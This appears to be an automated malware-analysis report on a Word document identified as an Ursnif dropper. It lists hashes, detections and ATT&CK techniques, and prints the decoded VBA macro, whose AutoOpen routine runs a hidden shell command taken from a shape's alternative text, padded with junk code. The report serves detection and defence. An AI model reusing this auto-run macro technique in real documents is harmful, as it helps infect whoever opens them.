Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 b7851f3d1b2f7cd1…

MALICIOUS

Office (OLE)

68.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 06f24f9cc306ec79fd8e4e40aa353baf SHA-1: 074337af03e7b4dda3f549223bd6904924d8fe55 SHA-256: b7851f3d1b2f7cd10b220613c74ce821206ba02c6349ebef9dc42af8f6710282
142 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating it is likely part of the Ursnif family. The presence of an AutoOpen VBA macro, specifically the 'macros.bas' script, suggests an attempt to execute malicious code upon opening the document. The script uses 'Interaction.Shell' to run a command, likely to download and execute a second-stage payload, which is a common dropper behavior.

Heuristics 5

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1414 bytes
SHA-256: b87169c34ec094d04406ad92ae4ed374ad713c2c8db663a65fef223e8607951f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "chefowe"
Function jeXhqoI()











Set jeXhqoI = ActiveDocument.Shapes(2)

Dim FDGWC As Integer
Dim rxanykir As Long
FDGWC = 6972# - 4508#
Dim jsRWEh As Variant
jsRWEh = FDGWC - 2899#



End Function
Sub AutoOpen()

Dim PFMlTrd As Integer
Dim NWLOoAWp As Long
PFMlTrd = 6104# - 1540#
Dim KOLlajz As Variant
KOLlajz = PFMlTrd - 8083#

Dim ubnuxW As Integer
Dim UdgvlwM As Long
ubnuxW = 5311# - 9974#
Dim RVgfDd As Variant
RVgfDd = ubnuxW - 7654#

Dim npuhypigif As Integer
Dim fruna As Long
npuhypigif = 1369# - 7219#
Dim qcykavyza As Variant
qcykavyza = npuhypigif - 2686#

Set rvuwage = jeXhqoI

IvqlPB = jeXhqoI.AlternativeText

Dim jpyxo As Integer
Dim Nzrnz As Long
jpyxo = 6713# - 8222#
Dim jNsepbzW As Variant
jNsepbzW = jpyxo - 4069#



Interaction.Shell@ _
IvqlPB, vbHide

Dim fzere As Integer
Dim xvusiromi As Long
fzere = 6854# - 2189#
Dim cGgzlFg As Variant
cGgzlFg = fzere - 7456#





Dim ssuqajaf As Integer
Dim zcEMGjY As Long
ssuqajaf = 5938# - 7681#
Dim vmyvog As Variant
vmyvog = ssuqajaf - 7366#

End Sub